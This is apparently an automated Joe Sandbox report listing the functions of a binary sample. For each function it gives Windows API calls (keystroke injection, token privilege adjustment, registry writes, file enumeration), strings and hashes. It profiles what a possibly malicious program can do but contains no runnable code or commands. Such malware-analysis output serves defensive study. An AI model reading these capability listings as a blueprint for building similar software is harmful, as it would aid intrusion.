Opcode Fuzzy Hash: 304a0bc49063b63ca91bca1c363e61b0cdef8d0b288a52bc79b17675cbb03784
Instruction Fuzzy Hash: 89F03971505712CFCB34AF64E494822BBE5BF553293208A3EE2D786722C7369840DF40

Function 009A0791 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 009A07B0

Part of subcall function 00987BCC: _memmove.LIBCMT ref: 00987C06

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: LongNamePath_memmove
String ID:
API String ID: 2514874351-0
Opcode ID: a77d89b464027acdd064af1b7d92131db7a54e477abf5cd5225ba6f5f9edc471
Instruction ID: 6e50e99fd783bb83cd286bea2f85389ae55d5c408ea0db135641519cf78a3291
Opcode Fuzzy Hash: a77d89b464027acdd064af1b7d92131db7a54e477abf5cd5225ba6f5f9edc471
Instruction Fuzzy Hash: 74E086369041285BC720E6989C05FEAB79DDBC87A0F0441B5FC08D7205D9609C818690

Function 009A525B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

__wfsopen.LIBCMT ref: 009A5266

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: __wfsopen
String ID:
API String ID: 197181222-0
Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction ID: 313545fe2c12dc246a5886101145bcce01bd2b9c9cedf8447cf82ad0f3ad62e6
Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction Fuzzy Hash: 62B0927654020C77CE012A82EC02B893B199B82764F408020FF1C18172A673A6649AC9

Function 013FCD1C Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 013FCD31

Memory Dump Source

Source File: 00000000.00000002.1288653675.00000000013FA000.00000040.00000020.00020000.00000000.sdmp, Offset: 013FA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13fa000_6SN0DJ38zZ.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction ID: 3d1727d508df85d33d8f142edfd9acb1f64d94d07515fa7fba4d364783bdf83e
Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction Fuzzy Hash: 25E0BF7498010DEFDB00EFA8D549ADE7FB4EF04301F1005A5FE05D7681DB309E548A62

Function 013FCD20 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 013FCD31

Memory Dump Source

Source File: 00000000.00000002.1288653675.00000000013FA000.00000040.00000020.00020000.00000000.sdmp, Offset: 013FA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13fa000_6SN0DJ38zZ.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: 2790b6e8a0abbcb720fa987deeaa97090ce6c4cdcf4eb33118f9bdf3a965dd76
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: 0CE0E67498010DDFDB00EFB8D549ADE7FB4EF04301F100165FD01D2281D6309D508A62

Non-executed Functions

Function 00A0CABC Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 632windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00982612: GetWindowLongW.USER32(?,000000EB), ref: 00982623

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00A0CB37
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00A0CB95
GetWindowLongW.USER32(?,000000F0), ref: 00A0CBD6
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00A0CC00
SendMessageW.USER32 ref: 00A0CC29
_wcsncpy.LIBCMT ref: 00A0CC95
GetKeyState.USER32(00000011), ref: 00A0CCB6
GetKeyState.USER32(00000009), ref: 00A0CCC3
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00A0CCD9
GetKeyState.USER32(00000010), ref: 00A0CCE3
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00A0CD0C
SendMessageW.USER32 ref: 00A0CD33
SendMessageW.USER32(?,00001030,?,00A0B348), ref: 00A0CE37
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00A0CE4D
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00A0CE60
SetCapture.USER32(?), ref: 00A0CE69
ClientToScreen.USER32(?,?), ref: 00A0CECE
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00A0CEDB
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00A0CEF5
ReleaseCapture.USER32 ref: 00A0CF00
GetCursorPos.USER32(?), ref: 00A0CF3A
ScreenToClient.USER32(?,?), ref: 00A0CF47
SendMessageW.USER32(?,00001012,00000000,?), ref: 00A0CFA3
SendMessageW.USER32 ref: 00A0CFD1
SendMessageW.USER32(?,00001111,00000000,?), ref: 00A0D00E
SendMessageW.USER32 ref: 00A0D03D
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00A0D05E
SendMessageW.USER32(?,0000110B,00000009,?), ref: 00A0D06D
GetCursorPos.USER32(?), ref: 00A0D08D
ScreenToClient.USER32(?,?), ref: 00A0D09A
GetParent.USER32(?), ref: 00A0D0BA
SendMessageW.USER32(?,00001012,00000000,?), ref: 00A0D123
SendMessageW.USER32 ref: 00A0D154
ClientToScreen.USER32(?,?), ref: 00A0D1B2
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00A0D1E2
SendMessageW.USER32(?,00001111,00000000,?), ref: 00A0D20C
SendMessageW.USER32 ref: 00A0D22F
ClientToScreen.USER32(?,?), ref: 00A0D281
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00A0D2B5

Part of subcall function 009825DB: GetWindowLongW.USER32(?,000000EB), ref: 009825EC

GetWindowLongW.USER32(?,000000F0), ref: 00A0D351

Strings

F, xrefs: 00A0D235
@GUI_DRAGID, xrefs: 00A0CE9C

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
String ID: @GUI_DRAGID$F
API String ID: 3977979337-4164748364
Opcode ID: 7ef1d97c0349beff3b9b15267b8fc9a494a3393d29e08fb33468fb3692db3e3f
Instruction ID: 81f8e168e315397b41db7e91301fbda94f5636858b57eb1b464ff84e3cc3b6c3
Opcode Fuzzy Hash: 7ef1d97c0349beff3b9b15267b8fc9a494a3393d29e08fb33468fb3692db3e3f
Instruction Fuzzy Hash: 5442CE78604348AFD720CF68E844BAABBE5FF8A320F140A29F555972F1D731D842DB52

Function 00996F9E Relevance: 48.8, APIs: 19, Strings: 6, Instructions: 5018COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 009971C3
_memset.LIBCMT ref: 00997539
_memmove.LIBCMT ref: 009976AC

Strings

[:>:]], xrefs: 00997492
[:<:]], xrefs: 00997479
\b(?=\w), xrefs: 009D3769
Q\E, xrefs: 00997FCB
DEFINE, xrefs: 009D2103
\b(?<=\w), xrefs: 009D3773

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: _memmove$_memset
String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
API String ID: 1357608183-1798697756
Opcode ID: db96b5ebb3f2e1f60c7afc6587aa08a57c5ff0810a95875adcd2bf4742e8d929
Instruction ID: e53ee05c59651e5175507fccc39891d310ad296d031e76039e2bfbf109019777
Opcode Fuzzy Hash: db96b5ebb3f2e1f60c7afc6587aa08a57c5ff0810a95875adcd2bf4742e8d929
Instruction Fuzzy Hash: 9A93AF71A44219DBDF24CFA8C881BADB7B5FF58310F24C56AE945AB380E7749E81CB50

Function 009848D7 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,?), ref: 009848DF
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 009BD665
IsIconic.USER32(?), ref: 009BD66E
ShowWindow.USER32(?,00000009), ref: 009BD67B
SetForegroundWindow.USER32(?), ref: 009BD685
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 009BD69B
GetCurrentThreadId.KERNEL32 ref: 009BD6A2
GetWindowThreadProcessId.USER32(?,00000000), ref: 009BD6AE
AttachThreadInput.USER32(?,00000000,00000001), ref: 009BD6BF
AttachThreadInput.USER32(?,00000000,00000001), ref: 009BD6C7
AttachThreadInput.USER32(00000000,?,00000001), ref: 009BD6CF
SetForegroundWindow.USER32(?), ref: 009BD6D2
MapVirtualKeyW.USER32(00000012,00000000), ref: 009BD6E7
keybd_event.USER32(00000012,00000000), ref: 009BD6F2
MapVirtualKeyW.USER32(00000012,00000000), ref: 009BD6FC
keybd_event.USER32(00000012,00000000), ref: 009BD701
MapVirtualKeyW.USER32(00000012,00000000), ref: 009BD70A
keybd_event.USER32(00000012,00000000), ref: 009BD70F
MapVirtualKeyW.USER32(00000012,00000000), ref: 009BD719
keybd_event.USER32(00000012,00000000), ref: 009BD71E
SetForegroundWindow.USER32(?), ref: 009BD721
AttachThreadInput.USER32(?,?,00000000), ref: 009BD748

Strings

Shell_TrayWnd, xrefs: 009BD660

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: 44542af3a25613ae8cdde2b5f3d8f7b228a3911d7f7cd2a0ff3b0025ac444157
Instruction ID: aec49e8ae55e99c15a129c95676be8950d4e195672ddb2fc52ade6ea61eb0687
Opcode Fuzzy Hash: 44542af3a25613ae8cdde2b5f3d8f7b228a3911d7f7cd2a0ff3b0025ac444157
Instruction Fuzzy Hash: A2315871A4131CBEEB315BA19C89FBF7F6CEB44B60F104025FA04F61D1DA715902ABA1

Function 009D8310 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON

Download Yara Rule

APIs

Part of subcall function 009D87E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 009D882B
Part of subcall function 009D87E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 009D8858
Part of subcall function 009D87E1: GetLastError.KERNEL32 ref: 009D8865

_memset.LIBCMT ref: 009D8353
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 009D83A5
CloseHandle.KERNEL32(?), ref: 009D83B6
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 009D83CD
GetProcessWindowStation.USER32 ref: 009D83E6
SetProcessWindowStation.USER32(00000000), ref: 009D83F0
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 009D840A

Part of subcall function 009D81CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,009D8309), ref: 009D81E0
Part of subcall function 009D81CB: CloseHandle.KERNEL32(?,?,009D8309), ref: 009D81F2

Strings

winsta0, xrefs: 009D83C8
, xrefs: 009D8362
default, xrefs: 009D8405

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
String ID: $default$winsta0
API String ID: 2063423040-1027155976
Opcode ID: 016228e90e2f6ff57e94e0be1f23a4c7953cded180b6ca321eb88d45be4b3cd0
Instruction ID: f4c78fde772f585e14f5e972ed11679364efe57a599b6a2a4749f62d52e1a1eb
Opcode Fuzzy Hash: 016228e90e2f6ff57e94e0be1f23a4c7953cded180b6ca321eb88d45be4b3cd0
Instruction Fuzzy Hash: 258149B1940249AFDF11DFA4DC45AEFBB78EF04304F1481AAF914A6262DB318A16DB60

Function 009EC75C Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 009EC78D
FindClose.KERNEL32(00000000), ref: 009EC7E1
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 009EC806
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 009EC81D
FileTimeToSystemTime.KERNEL32(?,?), ref: 009EC844
__swprintf.LIBCMT ref: 009EC890
__swprintf.LIBCMT ref: 009EC8D3

Part of subcall function 00987DE1: _memmove.LIBCMT ref: 00987E22

__swprintf.LIBCMT ref: 009EC927

Part of subcall function 009A3698: __woutput_l.LIBCMT ref: 009A36F1

__swprintf.LIBCMT ref: 009EC975

Part of subcall function 009A3698: __flsbuf.LIBCMT ref: 009A3713
Part of subcall function 009A3698: __flsbuf.LIBCMT ref: 009A372B

__swprintf.LIBCMT ref: 009EC9C4
__swprintf.LIBCMT ref: 009ECA13
__swprintf.LIBCMT ref: 009ECA62

Strings

%4d%02d%02d%02d%02d%02d, xrefs: 009EC88A
%02d, xrefs: 009EC91B, 009EC925, 009EC973, 009EC9C2, 009ECA11, 009ECA60
%4d, xrefs: 009EC8CD

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
API String ID: 3953360268-2428617273
Opcode ID: 62b46aad96f801444e0d0e5216c180a1dd8a3b573ad22c9d71e26fb82c4e75dc
Instruction ID: ae87b6ca1fe660e957fa02926dd9a3a3cab336a03a778b31e5b513f0d1e3ac5f
Opcode Fuzzy Hash: 62b46aad96f801444e0d0e5216c180a1dd8a3b573ad22c9d71e26fb82c4e75dc
Instruction Fuzzy Hash: 41A13CB1408344ABC750FFA4C886EBFB7ECBFD8704F440919F59596291EA34DA09CB62

Function 009EEF95 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 009EEFB6
_wcscmp.LIBCMT ref: 009EEFCB
_wcscmp.LIBCMT ref: 009EEFE2
GetFileAttributesW.KERNEL32(?), ref: 009EEFF4
SetFileAttributesW.KERNEL32(?,?), ref: 009EF00E
FindNextFileW.KERNEL32(00000000,?), ref: 009EF026
FindClose.KERNEL32(00000000), ref: 009EF031
FindFirstFileW.KERNEL32(*.*,?), ref: 009EF04D
_wcscmp.LIBCMT ref: 009EF074
_wcscmp.LIBCMT ref: 009EF08B
SetCurrentDirectoryW.KERNEL32(?), ref: 009EF09D
SetCurrentDirectoryW.KERNEL32(00A38920), ref: 009EF0BB
FindNextFileW.KERNEL32(00000000,00000010), ref: 009EF0C5
FindClose.KERNEL32(00000000), ref: 009EF0D2
FindClose.KERNEL32(00000000), ref: 009EF0E4

Strings

*.*, xrefs: 009EF048

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1803514871-438819550
Opcode ID: 840a5a8497ab773ef5b19cdf929117b2de68c5d416528ba3d8830de7a1203e11
Instruction ID: 09ab7d8adc5c107f4a6bc89f3c24896b86c62a3c79f3eb09a9c155b034524b8e
Opcode Fuzzy Hash: 840a5a8497ab773ef5b19cdf929117b2de68c5d416528ba3d8830de7a1203e11
Instruction Fuzzy Hash: DC31C03250124C7ECB25EBA5EC58BEE77ACAF49361F104576F804E2091DB74DE46CA61

Function 00A00857 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A00953
RegCreateKeyExW.ADVAPI32(?,?,00000000,00A0F910,00000000,?,00000000,?,?), ref: 00A009C1
RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00A00A09
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00A00A92
RegCloseKey.ADVAPI32(?), ref: 00A00DB2
RegCloseKey.ADVAPI32(00000000), ref: 00A00DBF

Strings

REG_BINARY, xrefs: 00A00D4D
REG_EXPAND_SZ, xrefs: 00A00A2F
REG_DWORD, xrefs: 00A00C83
REG_QWORD, xrefs: 00A00D00
REG_MULTI_SZ, xrefs: 00A00B7A
REG_SZ, xrefs: 00A00AD0

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: Close$ConnectCreateRegistryValue
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 536824911-966354055
Opcode ID: 47035ebcd12bd82b911045a55cfc823b1e1741432b3e1c3afbd65e427739a70c
Instruction ID: 4f98e14445f76cb9cfaa2fb9683c61fdcbe37d7c4b180b12bb216cccfd22df10
Opcode Fuzzy Hash: 47035ebcd12bd82b911045a55cfc823b1e1741432b3e1c3afbd65e427739a70c
Instruction Fuzzy Hash: 7B0225756006059FCB14EF28D891F2AB7E5BF89314F04885CF88A9B3A2DB30ED45CB91

Function 009EF0F2 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 009EF113
_wcscmp.LIBCMT ref: 009EF128
_wcscmp.LIBCMT ref: 009EF13F

Part of subcall function 009E4385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 009E43A0

FindNextFileW.KERNEL32(00000000,?), ref: 009EF16E
FindClose.KERNEL32(00000000), ref: 009EF179
FindFirstFileW.KERNEL32(*.*,?), ref: 009EF195
_wcscmp.LIBCMT ref: 009EF1BC
_wcscmp.LIBCMT ref: 009EF1D3
SetCurrentDirectoryW.KERNEL32(?), ref: 009EF1E5
SetCurrentDirectoryW.KERNEL32(00A38920), ref: 009EF203
FindNextFileW.KERNEL32(00000000,00000010), ref: 009EF20D
FindClose.KERNEL32(00000000), ref: 009EF21A
FindClose.KERNEL32(00000000), ref: 009EF22C

Strings

*.*, xrefs: 009EF190

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 1824444939-438819550
Opcode ID: bf237d02fd55ab1ce3d87dbe49ec39b20d6221b2bf15e051758bce5d3b9ea5f3
Instruction ID: 22667d7109d56e8fde4d3c4f53d683ea09f93a2923763a6c32c4d8dc28d35c2c
Opcode Fuzzy Hash: bf237d02fd55ab1ce3d87dbe49ec39b20d6221b2bf15e051758bce5d3b9ea5f3
Instruction Fuzzy Hash: 5631C43650425DBEDF21EBA5EC69BEE77ACAF89360F100172F914A2190DB30DE46CA54

Function 009EA1EF Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 009EA20F
__swprintf.LIBCMT ref: 009EA231
CreateDirectoryW.KERNEL32(?,00000000), ref: 009EA26E
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 009EA293
_memset.LIBCMT ref: 009EA2B2
_wcsncpy.LIBCMT ref: 009EA2EE
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 009EA323
CloseHandle.KERNEL32(00000000), ref: 009EA32E
RemoveDirectoryW.KERNEL32(?), ref: 009EA337
CloseHandle.KERNEL32(00000000), ref: 009EA341

Strings

\, xrefs: 009EA247
:, xrefs: 009EA252
\??\%s, xrefs: 009EA22B

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
String ID: :$\$\??\%s
API String ID: 2733774712-3457252023
Opcode ID: 3de5c90a64b6208fe9fbbb37278f01eea7bd4ce641001202cac3f752c0c27373
Instruction ID: ff243a4d335adb716eb38cf0303f9b06b381e597722f38417e0f45fc3216cf39
Opcode Fuzzy Hash: 3de5c90a64b6208fe9fbbb37278f01eea7bd4ce641001202cac3f752c0c27373
Instruction Fuzzy Hash: 0031067190024AAFDB21DFA1DC49FEB37BCEF89700F1040B6F608E6160E770AA458B65

Function 009D7CAF Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 009D8202: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 009D821E
Part of subcall function 009D8202: GetLastError.KERNEL32(?,009D7CE2,?,?,?), ref: 009D8228
Part of subcall function 009D8202: GetProcessHeap.KERNEL32(00000008,?,?,009D7CE2,?,?,?), ref: 009D8237
Part of subcall function 009D8202: HeapAlloc.KERNEL32(00000000,?,009D7CE2,?,?,?), ref: 009D823E
Part of subcall function 009D8202: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 009D8255

Part of subcall function 009D829F: GetProcessHeap.KERNEL32(00000008,009D7CF8,00000000,00000000,?,009D7CF8,?), ref: 009D82AB
Part of subcall function 009D829F: HeapAlloc.KERNEL32(00000000,?,009D7CF8,?), ref: 009D82B2
Part of subcall function 009D829F: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,009D7CF8,?), ref: 009D82C3

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 009D7D13
_memset.LIBCMT ref: 009D7D28
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 009D7D47
GetLengthSid.ADVAPI32(?), ref: 009D7D58
GetAce.ADVAPI32(?,00000000,?), ref: 009D7D95
